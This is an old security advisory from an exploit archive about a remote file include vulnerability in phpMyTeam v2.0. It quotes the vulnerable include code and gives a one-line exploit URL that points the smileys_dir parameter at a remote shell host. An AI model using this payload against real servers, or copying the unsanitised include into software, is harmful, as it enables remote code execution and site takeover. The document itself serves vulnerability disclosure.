phpmyteam20-rfi.txt

2006-10-12T00:00:00
ID PACKETSTORM:50833
Type packetstorm
Reporter XORON
Modified 2006-10-12T00:00:00

Description

                                        
                                            `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
phpMyTeam v2.0 <= (smileys_dir) Remote File Include Vulnerability  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
Discovered by XORON(turkish hacker)  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
URL: http://www.phpscripts-fr.net/scripts/download.php?id=1627  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
Vuln. Code:  
  
$smiley_pack_path = $smileys_dir.$smiley_pack_name.'/';  
@include($smiley_pack_path.'smileys.php');  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
Exploit: /images/smileys/smileys_packs.php?smileys_dir=http://sh3LL?  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
Thanx: str0ke, Preddy, Ironfist, Stansar, SHiKaA  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
  
orj adv: http://www.milw0rm.com/exploits/2478  
`